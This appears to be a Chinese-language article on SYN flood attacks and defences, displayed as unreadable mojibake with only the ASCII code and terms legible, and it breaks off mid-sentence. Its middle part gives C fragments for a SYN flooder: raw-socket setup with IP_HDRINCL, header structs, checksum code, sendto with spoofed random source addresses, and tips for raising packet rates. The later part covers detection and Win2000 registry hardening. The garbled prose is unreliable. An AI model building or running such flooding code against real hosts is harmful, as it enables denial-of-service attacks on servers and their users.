SYN Flood §ðÀ»ªº°ò¥»­ì²z¤Î¨¾¿m


§@ªÌ¡Rshotgun
²Ä¤@³¡¤À SYN Floodªº°ò¥»­ì²z SYN Flood¬O·í«e³Ì¬y¦æªºDoS¡]©Úµ´ªA°È§ðÀ»¡^»PDDoS¡]¤À´²¦¡©Úµ´ªA°È§ðÀ»¡^ªº¤è¦¡¤§ ¤@¡A³o¬O¤@ºØ§Q¥ÎTCP¨óij¯Ê³´¡Aµo°e¤j¶q°°³yªºTCP³s±µ½Ð¨D¡A±q¦Ó¨Ï±o³Q§ðÀ»¤è¸ê·½¯Ó ºÉ¡]CPUº¡­t²ü©Î°O¾ÐÅ餣¨¬¡^ªº§ðÀ»¤è¦¡¡C ­n©ú¥Õ³oºØ§ðÀ»ªº°ò¥»­ì²z¡AÁÙ¬O­n±qTCP³s±µ«Ø¥ßªº¹Lµ{¶}©l»¡°_¡G ¤j®a³£ª¾¹D¡ATCP»PUDP¤£¦P¡A¥¦¬O°ò©ó³s±µªº¡A¤]´N¬O»¡¡G¬°¤F¦bªA°ÈºÝ©M¥Î¤áºÝ¤§¶¡¶Ç °eTCP¸ê®Æ¡A¥²¶·¥ý«Ø¥ß¤@­ÓµêÀÀ¹q¸ô¡A¤]´N¬OTCP³s±µ¡A«Ø¥ßTCP³s±µªº¼Ð·Ç¹Lµ{¬O³o¼Ëªº ¡G ­º¥ý¡A½Ð¨DºÝ¡]¥Î¤áºÝ¡^µo°e¤@­Ó¥]§tSYN¼Ð»xªºTCP³ø¤å¡ASYN§Y¦P¨B¡]Synchronize¡^¡A ¦P¨B³ø¤å·|«ü©ú¥Î¤áºÝ¨Ï¥Îªº°ð¥H¤ÎTCP³s±µªºªì©l§Ç¸¹¡F ²Ä¤G¨B¡A¦øªA¾¹¦b¦¬¨ì¥Î¤áºÝªºSYN³ø¤å«á¡A±Nªð¦^¤@­ÓSYN+ACKªº³ø¤å¡Aªí¥Ü¥Î¤áºÝªº½Ð ¨D³Q±µ¨ü¡A¦P®ÉTCP§Ç¸¹³Q¥[¤@¡AACK§Y½T»{¡]Acknowledgement¡^¡C ²Ä¤T¨B¡A¥Î¤áºÝ¤]ªð¦^¤@­Ó½T»{³ø¤åACKµ¹¦øªA¾¹ºÝ¡A¦P¼ËTCP§Ç¦C¸¹³Q¥[¤@¡A¨ì¦¹¤@­ÓTCP ³s±µ§¹¦¨¡C ¥H¤Wªº³s±µ¹Lµ{¦bTCP¨óij¤¤³QºÙ¬°¤T¦¸´¤¤â¡]Three-way Handshake¡^¡C °ÝÃD´N¥X¦bTCP³s±µªº¤T¦¸´¤¤â¤¤¡A°²³]¤@­Ó¥Î¤á¦V¦øªA¾¹µo°e¤FSYN³ø¤å«á¬ðµM¦º¾÷©Î±¼ ½u¡A¨º»ò¦øªA¾¹¦bµo¥XSYN+ACKÀ³µª³ø¤å«á¬OµLªk¦¬¨ì¥Î¤áºÝªºACK³ø¤åªº¡]²Ä¤T¦¸´¤¤âµL ªk§¹¦¨¡^¡A³oºØ±¡ªp¤U¦øªA¾¹ºÝ¤@¯ë·|­«¸Õ¡]¦A¦¸µo°eSYN+ACKµ¹¥Î¤áºÝ¡^¨Ãµ¥«Ý¤@¬q®É ¶¡«á¥á±ó³o­Ó¥¼§¹¦¨ªº³s±µ¡A³o¬q®É¶¡ªºªø«×§Ú­ÌºÙ¬°SYN Timeout¡A¤@¯ë¨Ó»¡³o­Ó®É¶¡ ¬O¤ÀÄÁªº¼Æ¶q¯Å¡]¤j¬ù¬°30¬í-2¤ÀÄÁ¡^¡F¤@­Ó¥Î¤á¥X²{²§±`¾É­P¦øªA¾¹ªº¤@­Ó½uµ{µ¥«Ý1 ¤ÀÄÁ¨Ã¤£¬O¤°»ò«Ü¤jªº°ÝÃD¡A¦ý¦pªG¦³¤@­Ó´c·Nªº§ðÀ»ªÌ¤j¶qÃþ¤ñ³oºØ±¡ªp¡A¦øªA¾¹ºÝ±N ¬°¤FºûÅ@¤@­Ó«D±`¤jªº¥b³s±µ¦Cªí¦Ó®ø¯Ó«D±`¦hªº¸ê·½---- ¼Æ¥H¸U­pªº¥b³s±µ¡A§Y¨Ï¬O²³æªº«O¦s¨Ã¹M¾ä¤]·|®ø¯Ó«D±`¦hªºCPU®É¶¡©M°O¾ÐÅé ¡A¦óªpÁÙ­n¤£Â_¹ï³o­Ó¦Cªí¤¤ªºIP¶i¦æSYN+ACKªº­«¸Õ¡C¹ê»Ú¤W¦pªG¦øªA¾¹ªºTCP/IP´Ì¤£ °÷±j¤j¡A³Ì«áªºµ²ªG©¹©¹¬O°ïÅ|·¸¦ì±Y¼ì---§Y¨Ï¦øªA¾¹ºÝªº¨t²Î¨¬°÷±j¤j¡A¦øªA¾¹ºÝ¤] ±N¦£©ó³B²z§ðÀ»ªÌ°°³yªºTCP³s±µ½Ð¨D¦ÓµL·v²z¸B«È¤áªº¥¿±`½Ð¨D¡]²¦³º¥Î¤áºÝªº¥¿±`½Ð ¨D¤ñ²v«D±`¤§¤p¡^¡A¦¹®É±q¥¿±`«È¤áªº¨¤«×¬Ý¨Ó¡A¦øªA¾¹¥¢¥hÅTÀ³¡A³oºØ±¡ªp§Ú­ÌºÙ§@¡G ¦øªA¾¹ºÝ¨ü¨ì¤FSYN Flood§ðÀ»¡]SYN¬x¤ô§ðÀ»¡^¡C ±q¨¾¿m¨¤«×¨Ó»¡¡A¦³´XºØ²³æªº¸Ñ¨M¤èªk¡A²Ä¤@ºØ¬OÁYµuSYN Timeout®É¶¡¡A¥Ñ©óSYN Flood§ðÀ»ªº®ÄªG¨ú¨M©ó¦øªA¾¹¤W«O«ùªºSYN¥b³s±µ¼Æ¡A³o­Ó­È=SYN§ðÀ»ªºÀW«× x SYN Timeout¡A©Ò¥H³q¹LÁYµu±q±µ¦¬¨ìSYN³ø¤å¨ì½T©w³o­Ó³ø¤åµL®Ä¨Ã¥á±ó§ï³s±µªº®É¶¡¡A¨Ò¦p ³]¸m¬°20¬í¥H¤U¡]¹L§CªºSYN Timeout³]¸m¥i¯à·|¼vÅT«È¤áªº¥¿±`³X°Ý¡^¡A¥i¥H¦¨­¿ªº­° §C¦øªA¾¹ªº­t²ü¡C ²Ä¤GºØ¤èªk¬O³]¸mSYN Cookie¡A´N¬Oµ¹¨C¤@­Ó½Ð¨D³s±µªºIP¦ì§}¤À°t¤@­ÓCookie¡A¦pªGµu ®É¶¡¤º³sÄò¨ü¨ì¬Y­ÓIPªº­«½ÆSYN³ø¤å¡A´N»{©w¬O¨ü¨ì¤F§ðÀ»¡A¥H«á±q³o­ÓIP¦a§}¨Óªº¥] ·|³Q¤@·§¥á±ó¡C ¥i¬O¤W­zªº¨âºØ¤èªk¥u¯à¹ï¥I¤ñ¸û­ì©lªºSYN Flood§ðÀ»¡AÁYµuSYN Timeout®É¶¡¶È¦b¹ï¤è §ðÀ»ÀW«×¤£°ªªº±¡ªp¤U¥Í®Ä¡ASYN Cookie§ó¨Ì¿à¤_¹ï¤è¨Ï¥Î¯u¹êªºIP¦ì§}¡A¦pªG§ðÀ»ªÌ¥H ¼Æ¸U/¬íªº³t«×µo°eSYN³ø¤å¡A¦P®É§Q¥ÎSOCK_RAWÀH¾÷§ï¼gIP³ø¤å¤¤ªº·½¦ì§}¡A¥H¤Wªº¤èªk ±N²@µL¥ÎªZ¤§¦a¡C ²Ä¤G³¡¥÷ SYN Flooder·½½X¸ÑŪ ¤U­±§Ú­Ì¨Ó¤ÀªRSYN Flooderªºµ{¦¡¹ê²{¡C ­º¥ý¡A§Ú­Ì¨Ó¬Ý¤@¤UTCP³ø¤åªº®æ¦¡¡G 0 1 2 3 4 5 6 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 6 8 0 2 4 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¢×¢Þ­º³¡ | ¢â¢Ñ¢Þ­º³¡ | ¢â¢Ñ¢Þ¸ê®Æ¬q¡@¡@ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ¹Ï¤@ TCP³ø¤åµ²ºc ¦p¤W¹Ï©Ò¥Ü¡A¤@­ÓTCP³ø¤å¥Ñ¤T­Ó³¡¤Àºc¦¨¡G20¦ì¤¸²ÕªºIP­º³¡¡B20¦ì¤¸²ÕªºTCP­º³¡»P¤£ ©wªøªº¸ê®Æ¬q¡A¡]¹ê»Ú¾Þ§@®É¥i¯à·|¦³¥i¿ïªºIP¿ï¶µ¡A³oºØ±¡ªp¤UTCP­º³¡¦V«á¶¶©µ¡^¥Ñ ©ó§Ú­Ì¥u¬Oµo°e¤@­ÓSYN«H¸¹¡A¨Ã¤£¶Ç»¼¥ô¦ó¸ê®Æ¡A©Ò¥HTCP¸ê®Æ¬q¬°ªÅ¡CTCP­º³¡ªº¸ê®Æ µ²ºc¬°¡G 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤Q¤»¦ì·½°ð¸¹ | ¤Q¤»¦ì¤¸¥Ø¼Ð°ð¸¹ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤T¤Q¤G¦ì§Ç¦C¸¹ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤T¤Q¤G¦ì½T»{¸¹ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¥|¦ì | |U|A|P|R|S|F| | | ­º³¡ |¤»¦ì«O¯d¦ì¤¸ |R|C|S|S|Y|I| ¤Q¤»¦ì¤¸µ¡¤f¤j¤p | | ªø«× | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤Q¤»¦ì®ÕÅç©M | ¤Q¤»¦ìºò«æ«ü°w | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¿ï¶µ¡]­Y¦³¡^ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¼Æ¾Ú¡]­Y¦³¡^ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- ¹Ï¤G TCP­º³¡µ²ºc ®Ú¾ÚTCP³ø¤å®æ¦¡¡A§Ú­Ì©w¸q¤@­Óµ²ºcTCP_HEADER¥Î¨Ó¦s©ñTCP­º³¡¡G typedef struct _tcphdr { USHORT th_sport; //16¦ì·½°ð USHORT th_dport; //16¦ì¤¸¥Øªº°ð unsigned int th_seq; //32¦ì§Ç¦C¸¹ unsigned int th_ack; //32¦ì½T»{¸¹ unsigned char th_lenres; //4¦ì­º³¡ªø«×+6¦ì«O¯d¦r¤¤ªº4¦ì unsigned char th_flag; //2¦ì¤¸«O¯d¦r+6¦ì¤¸¼Ð»x¦ì¤¸ USHORT th_win; //16¦ì¤¸µ¡¤f¤j¤p USHORT th_sum; //16¦ì®ÕÅç©M USHORT th_urp; //16¦ì¤¸ºò«æ¸ê®Æ°¾²¾¶q }TCP_HEADER; ³q¹L¥H¥¿½Tªº¸ê®Æ¶ñ¥R³o­Óµ²ºc¨Ã±NTCP_HEADER.th_flag½á­È¬°2¡]¤G¶i¦ìªº00000010¡^ §Ú­Ì¯à»s³y¤@­ÓSYNªºTCP³ø¤å¡A³q¹L¤j¶qµo°e³o­Ó³ø¤å¥i¥H¹ê²{SYN Floodªº®ÄªG¡C¦ý¬O ¬°¤F¶i¦æIP´ÛÄF±q¦ÓÁôÂæۤv¡A¤]¬°¤F¸úÁצøªA¾¹ªºSYN CookieÀˬd¡AÁٻݭnª½±µ¹ïIP­º ³¡¶i¦æ¾Þ§@¡G 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ª©¥» | ªø«× | ¤K¦ìªA°ÈÃþ«¬| ¤Q¤»¦ìÁ`ªø«× | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤Q¤»¦ì¤¸¼ÐÃÑ | ¼Ð»x| ¤Q¤T¦ì¤¸¤ù°¾²¾¡@¡@ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- | ¤K¦ì¤¸¥Í¦s®É¶¡ | ¤K¦ì¤¸¨óij | ¤Q¤»¦ì¤¸­º³¡®ÕÅç©M| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¤T¤Q¤G¦ì·½¢×¢Þ¦a§} | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¤T¤Q¤G¦ì¤¸¥Øªº¢×¢Þ¦ì§} | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¿ï¶µ¡]­Y¦³¡^ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ¡@¡@¼Æ¾Ú¡@¡@ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ¹Ï¤T IP­º³¡µ²ºc ¦P¼Ë©w¸q¤@­ÓIP_HEADER¨Ó¦s©ñIP­º³¡ typedef struct _iphdr { unsigned char h_verlen; //4¦ì­º³¡ªø«×+4¦ìIPª©¥»¸¹ unsigned char tos; //8¦ìªA°ÈÃþ«¬TOS unsigned short total_len; //16¦ì¤¸Á`ªø«×¡]¦ì¤¸²Õ¡^ unsigned short ident; //16¦ì¤¸¼ÐÃÑ unsigned short frag_and_flags; //3¦ì¤¸¼Ð»x¦ì¤¸ unsigned char ttl; //8¦ì¥Í¦s®É¶¡ TTL unsigned char proto; //8¦ì¤¸¨óij¸¹(TCP, UDP ©Î¨ä¥L) unsigned short checksum; //16¦ìIP­º³¡®ÕÅç©M unsigned int sourceIP; //32¦ì·½IP¦a§} unsigned int destIP; //32¦ì¤¸¥ØªºIP¦ì§} }IP_HEADER; µM«á³q¹LSockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_ OVERLAPPED)); «Ø¥ß¤@­Ó­ì©l®M¤¶­±¡A¥Ñ©ó§Ú­ÌªºIP·½¦ì§}¬O°°³yªº¡A©Ò¥H¤£¯à«ü±æ¨t²ÎÀ°§Ú­Ì­pºâIP®Õ Åç©M¡A§Ú­Ì±o¦b¦bsetsockopt¤¤³]¸mIP_HDRINCL§i¶D¨t²Î¦Û¤v¶ñ¥RIP­º³¡¨Ã¦Û¤v­pºâ®ÕÅç©M ¡G flag=TRUE; setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int)); IP®ÕÅç©Mªº­pºâ¤èªk¬O¡G­º¥ý±NIP­º³¡ªº®ÕÅç©MÄæ¦ì³]¬°0¡]IP_HEADER.checksum=0¡^,µM «á­pºâ¾ã­ÓIP­º³¡¡]¥]¬A¿ï¶µ¡^ªº¤G¶i¦ì¤Ï½Xªº©M¡A¤@­Ó¼Ð·Çªº®ÕÅç©M¨ç¼Æ¦p¤U©Ò¥Ü¡G USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) cksum += *(UCHAR*)buffer; cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } ³o­Ó¨ç¼Æ¨Ã¨S¦³¸g¹L¥ô¦óªºÀu¤Æ¡A¥Ñ©ó®ÕÅç©M¨ç¼Æ¬OTCP/IP¨ó©w¤¤³Q½Õ¥Î³Ì¦h¨ç¼Æ¤§¤@¡A ©Ò¥H¤@¯ë»¡¨Ó¡A¦b¹ê²{TCP/IP´Ì®É¡A·|®Ú¾Ú§@·~¨t²Î¹ï®ÕÅç©M¨ç¼Æ¶i¦æÀu¤Æ¡C TCP­º³¡®Ö¹ïÁ`©M»PIP­º³¡®ÕÅç©Mªº­pºâ¤èªk¬Û¦P¡A¦bµ{¦¡¤¤¨Ï¥Î¦P¤@­Ó¨ç¼Æ¨Ó­pºâ¡C »Ý­nª`·Nªº¬O¡A¥Ñ©óTCP­º³¡¤¤¤£¥]§t·½¦ì§}»P¥Ø¼Ð¦ì§}µ¥¸ê°T¡A¬°¤F«OÃÒTCP®ÕÅ窺¦³®Ä ©Ê¡A¦b¶i¦æTCP®ÕÅç©Mªº­pºâ®É¡A»Ý­n¼W¥[¤@­ÓTCP°°­º³¡ªº®ÕÅç©M¡A©w¸q¦p¤U¡G struct { unsigned long saddr; //·½¦a§} unsigned long daddr; //¥Øªº¦a§} char mbz; //¸mªÅ char ptcl; //¨óijÃþ«¬ unsigned short tcpl; //TCPªø«× }psd_header; µM«á§Ú­Ì±N³o¨â­ÓÄæ¦ì½Æ»s¨ì¦P¤@­Ó½w½Ä°ÏSendBuf¤¤¨Ã­pºâTCP®ÕÅç©M¡G memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_ header)); ­pºâIP®ÕÅç©Mªº®É­Ô¤£»Ý­n¥]¬ATCP°°­º³¡¡G memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); ip_header.checksum=checksum((USHORT *)SendBuf, sizeof(ip_header)+sizeof(tcp_ header)); ¦A±N­pºâ¹L®ÕÅç©MªºIP­º³¡»PTCP­º³¡½Æ»s¨ì¦P¤@­Ó½w½Ä°Ï¤¤´N¥i¥Hª½±µµo°e¤F¡G memcpy(SendBuf,&ip_header,sizeof(ip_header)); sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr,sizeof(DestAddr)); ¦]¬°¾ã­ÓTCP³ø¤å¤¤ªº©Ò¦³³¡¤À³£¬O§Ú­Ì¦Û¤v¼g¤Jªº¡]§@·~¨t²Î¤£·|°µ¥ô¦ó¤z¯A¡^¡A©Ò¥H §Ú­Ì¥i¥H¦bIP­º³¡¤¤©ñ¸mÀH¾÷ªº·½IP¦a§}¡A¦pªG°°³yªº·½IP¦ì§}½T¹ê¦³¤H¨Ï¥Î¡A¥L¦b±µ¦¬ ¨ì¦øªA¾¹ªºSYN+ACK³ø¤å«á·|µo°e¤@­ÓRST³ø¤å¡]¼Ð»x¦ì¤¸¬°00000100¡^¡A³qª¾¦øªA¾¹ºÝ¤£ »Ý­nµ¥«Ý¤@­ÓµL®Äªº³s±µ¡A¥i¬O¦pªG³o­Ó°°³yIP¨Ã¨S¦³¸j©w¦b¥ô¦óªº¥D¾÷¤W¡A¤£·|¦³¥ô¦ó ³]³Æ¥h³qª¾¥D¾÷¸Ó³s±µ¬OµL®Äªº¡]³o¥¿¬OTCP¨ó©wªº¯Ê³´¡^¡A¥D¾÷±N¤£Â_­«¸Õª½¨ìSYN Timeout®É¶¡«á¤~¯à¥á±ó³o­ÓµL®Äªº¥b³s±µ¡C©Ò¥H·í§ðÀ»ªÌ¨Ï¥Î¥D¾÷¤À§G«Üµ}²¨ªºIP¦ì§} ¬q¶i¦æ°°¸ËIPªºSYN Flood§ðÀ»®É¡A¦øªA¾¹¥D¾÷©Ó¨üªº­t²ü·|¬Û·íªº°ª¡A ®Ú¾Ú´ú¸Õ¡A¤@¥xPIII 550MHz+128MB+100Mbpsªº¾÷¾¹¨Ï¥Î¸g¹Lªì¨BÀu¤Æªº SYN Flooderµ{¦¡ ¥i¥H¥H16,000¥]/¬íªº³t«×µo°eTCP SYN³ø¤å¡A³o¼Ëªº§ðÀ»¤O¤w¸g¨¬¥H©ì«±¤j³¡¤ÀWEB¦øªA¾¹ ¤F¡C µy·L°Ê°Ê¸£µ¬§Ú­Ì´N·|µo²{¡A·Q¹ïSYN Flooderµ{¦¡¶i¦æÀu¤Æ¬O«Ü²³æªº¡A±qµ{¦¡ºc¬[¨Ó ¬Ý¡A§ðÀ»®É°j°é¤ºªº¥N½X¥D­n¬O¶i¦æ®ÕÅç©M­pºâ»P½w½Ä°Ïªº¶ñ¥R¡A¤@¯ëªº«ä¸ô¬O´£°ª®ÕÅç ©M­pºâªº³t«×¡A§Ú¬Æ¦Ü¨£¹L¥Î·J½s¥N½X½s¼gªº®ÕÅç©M¨ç¼Æ¡A¹ê»Ú¤W¡A¦³¥t¥~¤@­ÓÅܳqªº¤è ªk¥i¥H»´ÃP¹ê²{Àu¤Æ¦Ó¤S¤£»Ý­n°ª²`ªº½sµ{§Þ¥©©M¼Æ¾Çª¾ÃÑ¡A¡]¦Ñ¹ê»¡§a¡A§Ú¼Æ¾Ç¤ñ¸û®t :P¡^¡A§Ú­Ì¥J²Ó¬ã¨s¤F¨â­Ó¤£¦P·½¦a§}ªºTCP SYN³ø¤å«áµo²{¡A¨â­Ó³ø¤åªº¤j³¡¤ÀÄæ¦ì¬Û ¦P¡]¤ñ¦p¥Øªº¦a§}¡B¨óijµ¥µ¥¡^¡A¥u¦³·½¦ì§}©M®ÕÅç©M¤£¦P¡]¦pªG¬°¤FÁô½ª¡A·½°ð¤]¥i¥H ¦³ÅܤơA¦ý¬O¨Ã¤£¼vÅT§Ú­ÌºtºâªkÀu¤Æªº«ä¸ô¡^¡A¦pªG§Ú­Ì¨Æ¥ý­pºâ¦n¤j¶qªº·½¦ì§}»P®ÕÅç ©Mªº¹ïÀ³Ãö«Yªí¡]¦pªG¨ä¥LªºÄæ¦ì¦³ÅܤƤ]¥i¥H¥[¤J³o­Óªí¡^¡Aµ¥­pºâ§¹²¦¤F§ðÀ»µ{¦¡´N ¥u»Ý­n³æ¯Âªº²Õ¦X½w½Ä°Ï¨Ãµo°e¡]¥Î«ü°w¨Óª½±µ¾Þ§@½w½Ä°Ïªº¯S©w¦ì¸m¡A±q¨Æ¥ý­pºâ¦nªº¹ï À³ Ãö«Yªí¤¤Åª¥X¸ê®Æ¡A´À´«½w½Ä°Ï¬ÛÀ³Äæ¦ì¡^¡A³oºØ²³æªº¤u§@§¹¥þ¨ú¨M©ó¨t²Îµo°eIP¥]ªº³t «×¡A »Pµ{¦¡ªº®Ä²v¨S¦³¥ô¦óÃö«Y¡A³o¼Ë¡A§Y¨Ï¬OCPU¥DÀW¸û§Cªº¥D¾÷¤]¯à§Ö³tªºµo°e¤j¶qTCP SYN §ðÀ»¥]¡C ¦pªG¦Ò¼{¨ì½w½Ä°Ï«÷±µªº®É¶¡¡A¬Æ¦Ü¥i¥H©w¸q¤@­Ó«Ü¤jªº½w½Ä°Ï°}¦C¡A¶ñ¥R§¹²¦«á¦Aµo°e ¡]ÂúÆNµ¹³oºØ¤èªk·Q¤F¤@­Ó«Ü¶K¤Áªº¤ñ³ë¡G ¤õ½b¬¶¸Ë¼uÁöµM«ÜºC¡A¦ý¬O¤@¥¹¬¶¼u¤W½£¤F¥H«á´N¥i¥H³sÄò²r¯P¦aµo®g¤F:¡^¡C ²Ä¤T³¡¤À SYN Flood§ðÀ»ªººÊ´ú»P¨¾¿mªì±´ ¹ï©óSYN Flood§ðÀ»¡A¥Ø«e©|¨S¦³«Ü¦nªººÊ´ú©M¨¾¿m¤èªk¡A¤£¹L¦pªG¨t²ÎºÞ²z­û¼ô±x§ðÀ» ¤èªk©M¨t²Î¬[ºc¡A³q¹L¤@¨t¦Cªº³]©w¡A¤]¯à±q¤@©wµ{«×¤W­°§C³Q§ðÀ»¨t²Îªº­t²ü¡A´î»´­t ­±ªº¼vÅT¡C¡]³o¥¿¬O§Ú¼¶¼g¥»¤åªº¥D­n¥Øªº¡^ ¤@¯ë¨Ó»¡¡A¦pªG¤@­Ó¨t²Î¡]©Î¥D¾÷¡^­t²ü¬ðµM¤É°ª¬Æ¦Ü¥¢¥h¦^À³¡A¨Ï¥ÎNetstat ©R¥O¯à¬Ý ¨ì¤j¶qSYN_RCVDªº¥b³s±µ¡]¼Æ¶q>500©Î¥eÁ`³s±µ¼Æªº10%¥H¤W¡^¡A¥i¥H»{©w¡A³o­Ó¨t²Î¡] ©Î¥D¾÷¡^¾D¨ì¤FSYN Flood§ðÀ»¡C ¾D¨ìSYN Flood§ðÀ»«á¡A­º¥ý­n°µªº¬O¨úÃÒ¡A³q¹LNetstat ¡Vn ¡Vp tcp >resault.txt°O ¿ý¥Ø«e©Ò¦³TCP³s±µª¬ºA¬O¥²­nªº¡A¦pªG¦³¶å±´¾¹¡A©ÎªÌTcpDump¤§Ãþªº¤u¨ã¡A°O¿ýTCP SYN³ø¤åªº©Ò¦³²Ó¸`¤]¦³§U©ó¥H«á°l¬d©M¨¾¿m¡A»Ý­n°O¿ýªºÄæ¦ì¦³¡G·½¦ì§}¡BIP­º³¡¤¤ªº ¼ÐÃÑ¡BTCP­º³¡¤¤ªº§Ç¦C¸¹¡BTTL­Èµ¥¡A³o¨Ç¸ê°TÁöµM«Ü¥i¯à¬O§ðÀ»ªÌ°°³yªº¡A¦ý¬O¥Î¨Ó¤À ªR§ðÀ»ªÌªº¤ß²zª¬ºA©M§ðÀ»µ{¦¡¤]¤£µLÀ°§U¡C¯S§O¬OTTL­È¡A¦pªG¤j¶qªº§ðÀ»¥]¦ü¥G¨Ó¦Û ¤£¦PªºIP¦ý¬OTTL­È«o¬Û¦P¡A§Ú­Ì©¹©¹¯à±ÀÂ_¥X§ðÀ»ªÌ»P§Ú­Ì¤§¶¡ªº¸ô¥Ñ¾¹¶ZÂ÷¡A¦Ü¤Ö¤] ¥i¥H³q¹L¹LÂo¯S©wTTL­Èªº³ø¤å­°§C³Q§ðÀ»¨t²Îªº­t²ü ¡]¦b³oºØ±¡ªp¤UTTL­È»P§ðÀ»³ø¤å¤£¦Pªº¥Î¤á´N¥i¥H«ì´_¥¿±`³X°Ý¡^ «e­±´¿¸g´£¨ì¥i¥H³q¹LÁYµuSYN Timeout®É¶¡©M³]¸mSYN Cookie¨Ó¶i¦æSYN§ðÀ»«OÅ@¡A¹ï©ó Win2000¨t²Î¡AÁÙ¥i¥H³q¹L­×§ïµù¥Uªí­°§CSYN Floodªº¦M®`¡A¦bµù¥Uªí¤¤§@¦p¤U§ï°Ê¡G ­º¥ý¡A¥´¶}regedit¡A§ä¨ìHKEY_LOCAL_ MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters ¼W¥[¤@­ÓSynAttackProtectªºÁä­È¡AÃþ«¬¬°REG_DWORD¡A¨ú­È½d³ò¬O0-2¡A³o­Ó­È¨M©w¤F¨t ²Î¨ü¨ìSYN§ðÀ»®É±Ä¨úªº«OÅ@±¹¬I¡A¥]¬A´î¤Ö¨t²ÎSYN+ACKªº­«¸Õªº¦¸¼Æµ¥¡A¹w³]­È¬O0¡] ¨S¦³¥ô¦ó«OÅ@±¹¬I¡^¡A±ÀÂ˳]¸m¬O¼W¥[¤@­ÓTcpMaxHalfOpenªºÁä­È¡AÃþ«¬¬°REG_DWORD¡A ¨ú­È½d³ò¬O100-0xFFFF¡A³o­Ó­È¬O¨t²Î¤¹³\¦P®É¥´¶}ªº¥b³s±µ¡AÀq»{±¡ªp¤UWIN2K PRO©M SERVER¬O100¡A ADVANCED SERVER¬O 500¡A³o­Ó­È«ÜÃø½T©w¡A¨ú¨M©ó¦øªA¾¹TCP­t²üªºª¬ªp©M¥i¯à¨ü¨ìªº§ðÀ» ±j«×¡A ¨ãÅ骺­È»Ý­n¸g¹L¸ÕÅç¤~¯à¨M©w¡C ¼W¥[¤@­ÓTcpMaxHalfOpenRetriedªºÁä­È¡AÃþ«¬¬°REG_DWORD¡A¨ú­È½d³ò¬O80-0xFFFF¡AÀq »{±¡ªp¤UWIN2K PRO©MSERVER¬O80¡AADVANCED SERVER¬O400¡A³o­Ó­È¨M©w¤F¦b¤°»ò±¡ªp¤U ¨t²Î·|¥´¶}SYN§ðÀ»«OÅ@¡C §Ú­Ì¨Ó¤ÀªR¤@¤UWin2000ªºSYN§ðÀ»«OÅ@¾÷¨î¡G¥¿±`±¡ªp¤U¡AWin2K¹ïTCP³s±µªº¤T¦¸´¤¤â¦³ ¤@­Ó±`³Wªº³]¸m¡A¥]¬ASYN Timeout®É¶¡¡BSYN-ACKªº­«¸Õ¦¸¼Æ©MSYN³ø¤å±q¸ô¥Ñ¾¹¨ì¨t²Î ¦A¨ìWinsockªº©µ®Éµ¥¡A³o­Ó±`³W³]¸m¬O°w¹ï¨t²Î©Ê¯à¶i¦æÀu¤Æªº¡]¦w¥þ©M©Ê¯à©¹©¹¬Û¤¬ ¥Ù¬Þ¡^©Ò¥H¥i¥Hµ¹¥Î¤á´£¨Ñ¤è«K§Ö±¶ªºªA°È¡F¤@¥¹¦øªA¾¹¨ü¨ì§ðÀ»¡ASYN¥b³s±µªº¼Æ¶q¶W 